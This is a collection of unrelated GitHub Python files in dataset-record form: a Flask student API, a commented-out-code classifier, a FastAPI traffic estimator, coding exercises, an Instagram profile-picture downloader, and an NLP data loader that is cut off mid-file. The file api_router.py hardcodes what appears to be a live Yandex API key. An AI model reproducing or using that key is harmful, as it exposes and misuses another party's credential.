The `OrderingRecord.is_disordered` method\n # is not vectorized (operates on 1D site fractions), so we use `vectorize=True`.\n disordered_mask = xr.apply_ufunc(ord_rec.is_disordered, eq_result.where(mask).Y, input_core_dims=[['internal_dof']], vectorize=True)\n # Finally, use `xr.where` to set the value of the phase name to the disordered\n # phase everywhere the mask is true and use the existing value otherwise\n eq_result['Phase'] = xr.where(disordered_mask, ord_rec.disordered_phase_name, eq_result.Phase)\n return eq_result","repo_name":"pycalphad/scheil","sub_path":"scheil/ordering.py","file_name":"ordering.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"11045727745","text":"from http import HTTPStatus\nfrom flask import (\n Blueprint,\n request\n)\nfrom marshmallow import ValidationError\nimport pydash as py_\nfrom pymongo.errors import DuplicateKeyError\nfrom flask_jwt_extended import jwt_required, current_user\nimport src.constants as Consts\nimport src.schemas.student as SchemaStudent\nimport src.controllers as Controller\n\n\nbp = Blueprint('student', __name__, url_prefix='/api/student')\n\n\n@bp.route('', methods=['POST'])\n@jwt_required()\ndef add_student():\n user_id=py_.get(current_user, '_id')\n payload = request.get_json()\n args = request.args\n class_id = py_.get(args, 'class', None)\n try:\n student_id = Controller.Student.insert_student(user_id,class_id, payload)\n except ValidationError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": {\"id\":student_id},\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('', methods=['GET'])\n@jwt_required()\ndef get_student():\n user_id=py_.get(current_user, '_id')\n args = request.args\n page = py_.to_integer(py_.get(args, 'page', 1))\n page_size = py_.to_integer(py_.get(args, 'page_size', Consts.PAGE_SIZE_MAX))\n try:\n return_data = Controller.Student.list_students(user_id,page,page_size)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_oid(id):\n try:\n return_data = Controller.Student.one_student(id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('id/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_id(id):\n user_id = py_.get(current_user, '_id')\n try:\n return_data = Controller.Student.one_student_id(id,user_id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }","repo_name":"bezleen/attendance-app-backend","sub_path":"src/api/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31562551421","text":"# -*- coding:UTF-8 -*-\n\"\"\"\n@Description Find commented-out code in python 
scripts.\n@Author Zhang YT\n@Date 2020/10/23 14:38\n\"\"\"\nimport os\nfrom tokenize import tokenize, TokenError\nfrom ast import parse\nfrom json import dump\nfrom argparse import ArgumentParser\nfrom numpy import asarray, squeeze\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import sequence\nfrom time import process_time\nfrom functools import wraps\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 忽略警告信息,不加这一句警告贼多\n\n\ndef timethis(func):\n \"\"\"计时函数装饰器\"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = process_time()\n r = func(*args, **kwargs)\n end = process_time()\n print('{} executing time: {}s'.format(func.__name__, end - start))\n return r\n return wrapper\n\n\ndef create_generator(data):\n \"\"\"字符流生成器,在内部构建了一个闭包。\n 为了节约内存,避免一次性加载文件内容\"\"\"\n\n def generator():\n for elem in data:\n try:\n yield str.encode(elem)\n except:\n yield str.encode('')\n\n g = generator() # 生成器\n\n def next_element():\n return next(g)\n\n return next_element # 迭代器\n\n\nclass Classifier(object):\n def __init__(self,\n root_path, # 指定扫描目录,或者文件\n model_character_path, # (可选)训练好的character模型\n model_token_path, # (可选)训练好的 token模型\n vocab_path, # (可选)token模型使用的词表文件\n outfile, # (可选)输出结果的目录\n keyword=\"vocabs/vocab_keywords.txt\"\n ):\n self.root_path = root_path\n self.model_character_path = model_character_path\n self.model_token_path = model_token_path\n self.vocab_path = vocab_path\n self.outfile = outfile\n self.load_model() # 载入模型文件\n self.init_character_dict() # 初始化character模型所必需的词表\n self.init_token_dict(self.vocab_path) # 初始化token模型所必需的词表\n self.init_adjacent_dict(keyword) # 初始化python保留字表\n\n def load_model(self):\n self.lstm_model_character = load_model(self.model_character_path)\n self.lstm_model_token = load_model(self.model_token_path)\n\n def init_character_dict(self):\n \"\"\"初始化character模型所必需的词表\"\"\"\n # 所有可见字符将其映射为唯一的整数\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()` ,./<>?;':\\\"[]{}=-+_\\t\\r\\n|\\\\\"\n self.char_to_int = dict((c, i + 2) for i, c in enumerate(alphabet))\n self.char_to_int[''] = 0\n self.char_to_int[''] = 1\n self.int_to_char = dict((i, c) for c, i in self.char_to_int.items())\n\n def init_token_dict(self, vocab_path):\n \"\"\"初始化token模型所必需的词表\"\"\"\n # 从词表目录读取词表文件\n vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n vocab.append(line.rstrip('\\n'))\n self.token_2_id = {row: index + 8 for index, row in enumerate(vocab)}\n self.token_2_id[''] = 0\n self.token_2_id[''] = 1\n self.token_2_id[''] = 2\n self.token_2_id[''] = 3\n self.token_2_id[''] = 4\n self.token_2_id[''] = 5\n self.token_2_id[''] = 6\n self.token_2_id[''] = 7\n self.id_2_token = {v: k for k, v in self.token_2_id.items()}\n\n def init_adjacent_dict(self, vocab_path):\n \"\"\"初始化python保留字表\"\"\"\n # 从词表目录读取词表文件\n self.id_vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n self.id_vocab.append(line.rstrip('\\n'))\n\n @staticmethod\n def get_pyfile_path(root_path):\n \"\"\"获取指定目录及其子目录下所有的py文件的目录\"\"\"\n pyfiles = []\n root_path = os.path.abspath(root_path)\n for file_path, _, files in os.walk(root_path):\n for file in files:\n if file.endswith('.py'):\n pyfiles.append(os.path.join(file_path, file))\n return pyfiles\n\n @staticmethod\n def read_txtfile(filename):\n \"\"\"读取指定path对应的py文件的文本\"\"\"\n sharps = []\n try:\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n sharps.append(line.strip('\\n'))\n except UnicodeDecodeError:\n pass\n return 
sharps\n\n def gather_sharp_data(self, pyfiles):\n \"\"\"读取指定path对应的py文件的文本,并提取其#开头的所有行\"\"\"\n sharp_data = []\n for pyfile in pyfiles:\n pycontent = self.read_txtfile(pyfile)\n for lineno, line in enumerate(pycontent):\n if line.lstrip().startswith('#'):\n dic = {\n 'file': pyfile,\n 'line': lineno + 1,\n 'highlighted_element': line.lstrip(' #').rstrip()\n }\n sharp_data.append(dic)\n return sharp_data\n\n def from_text_to_character_input(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n for row in text:\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_character_input_and_index(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n indexes.append(index)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n def from_text_to_token_id(self, row):\n \"\"\"把一行代码转成token\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n tokens = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n if toknum == 1:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 2:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 3:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 53:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 56:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 57:\n tokens.append(self.token_2_id.get(''))\n except TokenError:\n pass # 遍历到末尾会raise error\n return tokens\n\n def check_adjacent_id(self, row):\n \"\"\"检查有没有相邻的两个id\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n res = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n res.append((toknum, tokval))\n except TokenError:\n pass\n # 检查有没有相邻的两个id,有的话则不是code\n for i in range(len(res) - 1):\n if res[i][0] == 1 \\\n and res[i + 1][0] == 1 \\\n and res[i][1] not in self.id_vocab \\\n and res[i + 1][1] not in self.id_vocab:\n return True\n return False\n\n def from_text_to_token_input(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n for row in text:\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return 
sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_token_input_and_index(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n indexes.append(index)\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n @staticmethod\n def reduce_sharp_by_rule(tuple_list):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出符合规则的[{file,line,highlighted_element}]\"\"\"\n reduced_set = [] # 还需进一步判断的行\n code_set = [] # 不需进一步判断的行\n for item in tuple_list:\n try:\n text_line = item['highlighted_element']\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n code_set.append(item)\n continue\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_set.append(item)\n continue\n reduced_set.append(item)\n except:\n reduced_set.append(item) # 不通过说明from语句没通过编译\n return reduced_set, code_set\n\n @timethis\n def classify(self):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出被怀疑为代码的[{file,line,highlighted_element}]\"\"\"\n # 获得数据\n if self.root_path.endswith('.py'):\n path = os.path.abspath(self.root_path)\n tuple_list = self.gather_sharp_data([path])\n else:\n tuple_list = self.gather_sharp_data(self.get_pyfile_path(self.root_path))\n print(f\"All testing comment number from {self.root_path}: {len(tuple_list)}.\")\n\n # 依照确定性算法,将注释分为需要进一步判断的tuple_list和code_list\n tuple_list, code_list = self.reduce_sharp_by_rule(tuple_list)\n # 防止模型输入为空\n if len(tuple_list) <= 0:\n print(\"1: No commented-out code.\")\n # 保存结果\n self.dump_res(code_list)\n return # 没发现值得进一步分析的行,提前结束\n else:\n print(\"Commented code number find by pure grammar checker: \", len(code_list))\n\n # 然后切分成token再输入token模型\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_token_input_and_index(sharps)\n predict_label = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_token = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_token.append(tuple_list[lineno])\n print(\"Commented code number find by `token` model: \", len(code_item_token))\n\n # 最后使用character模型逐字符判断\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_character_input_and_index(sharps)\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_char = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_char.append(tuple_list[lineno])\n 
print(\"Commented code number find by `character` model: \", len(code_item_char))\n\n code_list.extend(code_item_char)\n # 两个集合取并集\n for item in code_item_token:\n for item2 in code_item_char:\n if item.get('highlighted_element') == item2.get('highlighted_element') \\\n and item.get('line') == item2.get('line') \\\n and item.get('file') == item2.get('file'):\n break\n else:\n code_list.append(item)\n print(\"Total number of commented code: .\", len(code_list))\n # 保存结果\n self.dump_res(code_list)\n\n def contains_code(self, lines):\n waiting_line_index = []\n code_line_index = set()\n for index, text_line in enumerate(lines):\n try:\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n # compile(text_line, '', 'exec')\n code_line_index.add(index)\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_line_index.add(index)\n waiting_line_index.append(index)\n except:\n waiting_line_index.append(index) # 不通过说明from语句没通过编译\n # 然后切分成token再输入token模型\n sharp_inputs = self.from_text_to_token_input([lines[x] for x in waiting_line_index])\n predict_labels = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_labels) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n # 最后使用character模型逐字符判断\n sharp_inputs = self.from_text_to_character_input([lines[x] for x in waiting_line_index])\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_label) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n result = [False] * len(lines)\n for index in code_line_index:\n result[index] = True\n return result\n\n def dump_res(self, tuple_list):\n \"\"\"添加一些其他信息,然后整合成code_warning.json\"\"\"\n for dic in tuple_list:\n dic['offset'] = 0\n dic['length'] = 0\n dic['module'] = ''\n dic['problem_class'] = {\n 'name': '8_2',\n 'severity': '',\n 'inspection_name': '8_2',\n 'attribute_key': ''\n }\n dic['entry_point'] = {\n 'TYPE': '',\n 'FQNAME': ''\n }\n dic['description'] = 'Do not use comment lines to make the code invalid.'\n with open(os.path.join(self.outfile, 'code_warning.json'), 'w') as f:\n dump({'problems': tuple_list}, f)\n\n\ndef main():\n parser = ArgumentParser(description='Check if pyfile contains commented-out code.')\n\n parser.add_argument(dest='root_path', metavar='root_path',\n help='Check project root path')\n\n parser.add_argument('-mc', '--model_character_path',\n metavar='model_character_path',\n default='models/mc.hdf5',\n dest='model_character_path',\n help='character based model path')\n\n parser.add_argument('-mt', '--model_token_path',\n metavar='model_token_path',\n default='models/mt_20000.hdf5',\n dest='model_token_path',\n help='token based model path')\n\n parser.add_argument('-v', '--vocab',\n metavar='vocab_path',\n default='vocabs/vocab_20000.txt',\n dest='vocab_path',\n help='token 
vocabulary path')\n\n parser.add_argument('-o', dest='outfile',\n default='results',\n help='output file path')\n\n args = parser.parse_args()\n\n args = {'root_path': args.root_path,\n 'model_character_path': args.model_character_path,\n 'model_token_path': args.model_token_path,\n 'vocab_path': args.vocab_path,\n 'outfile': args.outfile,\n }\n\n classifier = Classifier(**args)\n classifier.classify()\n\nif __name__ == '__main__':\n main()\n","repo_name":"superlova/codeclf","sub_path":"codeclf.py","file_name":"codeclf.py","file_ext":"py","file_size_in_byte":20262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71103918889","text":"from fastapi import APIRouter, Request\r\nfrom fastapi.responses import JSONResponse\r\nfrom algorithm import *\r\nfrom math import radians, cos, sin, asin, sqrt\r\n\r\n\r\ndef get_distance(lat1, lat2, lon1, lon2):\r\n lon1 = radians(lon1)\r\n lon2 = radians(lon2)\r\n lat1 = radians(lat1)\r\n lat2 = radians(lat2)\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\r\n c = 2 * asin(sqrt(a))\r\n r = 6371\r\n return(c * r) * 1000\r\n\r\nrouter = APIRouter(\r\n prefix='/api'\r\n)\r\napikey = '67b62d8b-ea26-4350-a5f6-6e7a3c6ed99e'\r\nurl = 'https://geocode-maps.yandex.ru/1.x'\r\nparams = {\r\n 'apikey': apikey,\r\n 'geocode': None,\r\n 'sco': 'latlong',\r\n 'kind': 'metro',\r\n 'format': 'json'\r\n}\r\nbellar_district = District(0.7*202000, 0.7*212000)\r\n# 0.85 - 500 - 1000\r\nroads = {'Center': ([55.775503, 37.571737], [55.773229, 37.554314], [55.772581, 37.572870], [55.775097, 37.582827]),\r\n 'Out': ([55.774584, 37.560923], [55.770859, 37.567703], [55.773887, 37.579179])}\r\ntypes = {'ЖК': Houses, 'Жилое': House, 'Отель': Hotel, 'Офис': Office}\r\nmetro_cords = {'Белорусская': (55.777349, 37.581997), 'Беговая': (55.773106, 37.549837)}\r\n\r\n\r\n@router.get('/traffic')\r\nasync def get_info(cords: str, type: str, area: float, floors: int, schools: int, n: int, metro: str, time: str):\r\n cords = tuple(float(i) for i in cords.split(','))\r\n dst = get_distance(metro_cords[metro][0], cords[0], metro_cords[metro][1], cords[1])\r\n building = types[type](area, floors, dst, schools, n)\r\n roads = []\r\n metro_params = {'Default': {'Белорусская': 18000, 'Беговая': 13500}, 'Rush': {'Белорусская': 9.6, 'Беговая': 3.4}}\r\n metro = Metro(metro_params['Default'][metro], building.getter(), bellar_district.getter(), metro_params['Rush'][metro], 1, time) \r\n return metro.getter()\r\n\r\n","repo_name":"code-n-cry/DriveHack_MosTransProject","sub_path":"backend/api_router.py","file_name":"api_router.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"27600773174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/8/19 19:52\n# @File : p15_iterate_in_sorted_order_over_merged_sorted_iterables.py\n# @Software: PyCharm\n\n\"\"\"顺序迭代合并后的排序迭代对象\"\"\"\n\nimport heapq\n\na = [1, 4, 7, 10]\nb = [2, 5, 6, 11]\n\nfor i in heapq.merge(a, b):\n print(i, end=',')\n\n# heapq.merge 可迭代特性意味着它不会立马读取所有序列。这就意味着可以在非常长的序列中使用,而不会有太大的开销\n\n# heapq.merge() 需要所有输入序列必须是排过序的。\n# 它并不会预先读取所有数据到堆栈中或者预先排序,也不会对输入做任何的排序检测。\n# 
它仅仅是检查所有序列的开始部分并返回最小的那个,这个过程一直会持续直到所有输入序列中的元素都被遍历完。\n","repo_name":"mofei952/cookbook","sub_path":"c04_iterators_and_generators/p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_name":"p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37570036917","text":"import requests \r\nfrom bs4 import BeautifulSoup as bs \r\nimport json \r\nimport random \r\nimport os.path \r\nimport urllib.request\r\ninsta_url ='https://www.instagram.com'\r\ninta_username = input()\r\n\r\nresponse = requests.get(f\"{insta_url}/{inta_username}/\") \r\n\r\nif response.ok: \r\n\thtml = response.text \r\n\tbs_html = bs(html, features =\"lxml\") \r\n\tbs_html = bs_html.text \r\n\tindex = bs_html.find('profile_pic_url_hd')+21\r\n\tremaining_text = bs_html[index:] \r\n\tremaining_text_index = remaining_text.find('requested_by_viewer')-3\r\n\tstring_url = remaining_text[:remaining_text_index] \r\n\tX=string_url.split('\\\\u0026')\r\n\tstring_url=\"&\".join(X)\r\n\r\n\r\n\r\nurllib.request.urlretrieve(string_url, \"pic1.jpg\")\r\nprint(\"\\n\t\t\t downloading completed ..............\") \r\n","repo_name":"Scoder08/scoder","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22860508975","text":"def fib(n: int) -> int:\n \"\"\"\n Calculates the n-th Fibonacci number in O(log(n)) time.\n See: [Exercise 1.19](https://bit.ly/3Bhv2JR)\n \"\"\"\n if n < 0:\n fib_neg = fib(-n)\n return fib_neg if (1 - n) % 2 == 0 else -fib_neg\n\n a, b, p, q = 1, 0, 0, 1\n\n while n:\n if n % 2 == 0:\n p, q = (p**2 + q**2), (q**2 + 2 * p * q)\n n //= 2\n else:\n a, b = (b * q + a * p + a * q), (b * p + a * q)\n n -= 1\n\n return b\n","repo_name":"matyama/codewars","sub_path":"python/codewars/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34871259488","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef title(y_pred, y_test, target_names, idx):\n if y_pred.max() == 1 and y_test.max() == 1 and target_names.max() == 1:\n pred_name = \"Less or equal than 4\" if int(y_pred[idx]) == 0 else \"Greater or equal than 5\"\n exp_name = \"Less or equal than 4\" if y_test[idx] == 0 else \"Greater or equal than 5\"\n else:\n pred_name = target_names[int(y_pred[idx])]\n exp_name = target_names[y_test[idx]]\n \n return f\"predicted: {pred_name}\\nexpected: {exp_name}\"\n\n\ndef plot_gallery(images, titles, h, w, rows = 3, cols = 4):\n plt.figure(figsize=(1.8 * cols, 2.4 * rows))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35)\n\n for i in range(rows * cols):\n plt.subplot(rows, cols, i + 1)\n plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n plt.show()\n\n\ndef convert_target(target):\n new_target = list()\n\n for mark in target:\n if mark < 5:\n new_target.append(0)\n else:\n new_target.append(1)\n\n return np.array(new_target)","repo_name":"ThinkingFrog/OptimizationMethods","sub_path":"Coursework/recognition/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"74820724649","text":"\nfrom cs50 import get_string\n\n# Prompt user for text\ntext = get_string(\"Text: \")\n\n# words variable should have +1 because the last word is followed by a punctuation, and not by ' '\nwords = 1\nsentences = 0\nletters = 0\n\n# Loop through each character\nfor i in range(len(text)):\n \n # If the char is a letter, update the variable\n if text[i].isalpha():\n letters += 1\n \n # If it's a space, then it means it's the end of a word\n elif text[i] == ' ':\n words += 1\n \n # If it's a punct, update the sentences variable\n elif text[i] == '.' or text[i] == '?' or text[i] == '!':\n sentences += 1\n\n# l letters in w words ==> l -- w\n# L letters in 100 words: L -- 100\n\n# Equation becomes: 100.l = w.L\n# L = 100.l/w\n# Same goes for sentences\n\n# L is letters per 100 words\nL = (letters * 100) / words\n\n# S is sentences per 100 words\nS = (sentences * 100) / words\n\n# Coleman-Liau index\nindex = round(0.0588 * L - 0.296 * S - 15.8)\n\n# Print grade according to the index\nif index >= 16:\n print(\"Grade 16+\")\n \nelif index < 1:\n print(\"Before Grade 1\")\n \nelse:\n print(f\"Grade: {index}\")\n","repo_name":"gustavokenzo1/cs50","sub_path":"Week 6 - Readability.py","file_name":"Week 6 - Readability.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23725817464","text":"continua = str('sim')\nresposta = str('sim')\n\nwhile not resposta != continua:\n fat = 1\n\n n = int(input('Qual o fatorial?: '))\n\n for fatorial in range(1, n + 1):\n fat = fatorial * fat\n\n print(fat)\n resposta = str(input('Deseja continuar?: ').lower())\n\nprint('Programa encerrado a pedido do usuário.')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"livro_algoritmos/fatorail_interativo.py","file_name":"fatorail_interativo.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17590532778","text":"import flair \nimport torch\nimport numpy as np \nimport spacy\nimport transformers\nimport os, sys, time\nfrom tqdm import tqdm\nimport psutil\nimport pickle\nimport gensim\n\nfrom constants import spacy_pos_dict, spacy_model_names, gensim_fasttext_models\n\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\ndef print_memory_usage(label):\n process = psutil.Process(os.getpid())\n #print(process.memory_info())\n mem = process.memory_info().rss / 1024 / 1024\n print (\"{} using {:.2f} MB memory!\".format(label, mem))\n\nclass DataLoader():\n def __init__(self, split, args):\n self.args = args\n self.pos_tags = spacy_pos_dict[args.lang]\n if args.lm == \"bertmulti\":\n self.emb_dim = 768\n elif args.lm == \"fasttext\":\n self.emb_dim = 100\n else:\n self.emb_dim = -1\n cache_dataset_head = \"cache/{}_{}_{}_{}\".format(args.lang, args.lm, split, args.task)\n if os.path.exists(cache_dataset_head):\n pass\n #print (\"{} exists. 
Loading the datasets.\".format(cache_dataset_head))\n else:\n print (\"Generating dataset in {}\".format(cache_dataset_head))\n os.makedirs(cache_dataset_head)\n self._generate_data_pairs(split, cache_dataset_head, args)\n filelist_short = os.listdir(cache_dataset_head)\n self.ckpt_filelist = [os.path.join(cache_dataset_head, fn_short) for fn_short in filelist_short]\n self.ckpt_ptr = 0\n # self.x and self.y are loaded from the checkpoint in ckpt_filelist[self.ckpt_ptr]\n self.x = []\n self.y = [] \n self.ptr = 0 # iterates through self.x and self.y\n self.reset()\n\n if split == \"train\":\n self.batch_size = args.batch_size\n else:\n self.batch_size = 1\n\n def _generate_data_pairs(self, split, cache_dataset_head, args):\n \"\"\"\n Return CPU torch tensors\n \"\"\"\n # Corpus\n if args.lang == \"en\": \n corpus = flair.datasets.UD_ENGLISH()\n elif args.lang == \"fr\":\n corpus = flair.datasets.UD_FRENCH()\n elif args.lang == \"es\":\n corpus = flair.datasets.UD_SPANISH()\n else:\n raise ValueError\n if split == \"train\":\n corpus_split = corpus.train \n elif split == \"dev\":\n corpus_split = corpus.dev \n elif split == \"test\":\n corpus_split = corpus.test \n else:\n raise ValueError(\"split {} not accepted!\".format(split))\n\n # SpaCy tagger\n spacy_nlp = spacy.load(spacy_model_names[args.lang])\n\n # Word Embedding (huggingface)\n if args.lm == \"bertmulti\":\n emb_tag = \"bert-base-multilingual-cased\"\n tokenizer = transformers.BertTokenizer.from_pretrained(emb_tag)\n emb = transformers.BertModel.from_pretrained(emb_tag)\n self.emb_dim = emb.config.hidden_size\n elif args.lm == \"fasttext\":\n tokenizer = BaselineTokenizer()\n emb = gensim.models.FastText(gensim_fasttext_models[args.lang])\n self.emb_dim = 100\n elif args.lm == \"glove\":\n raise NotImplementedError\n else:\n raise ValueError(\"lm {} not supported\".format(args.lm))\n\n start_time = time.time()\n dumpcnt = 1\n all_x = []\n all_y = []\n for doc_id, article in 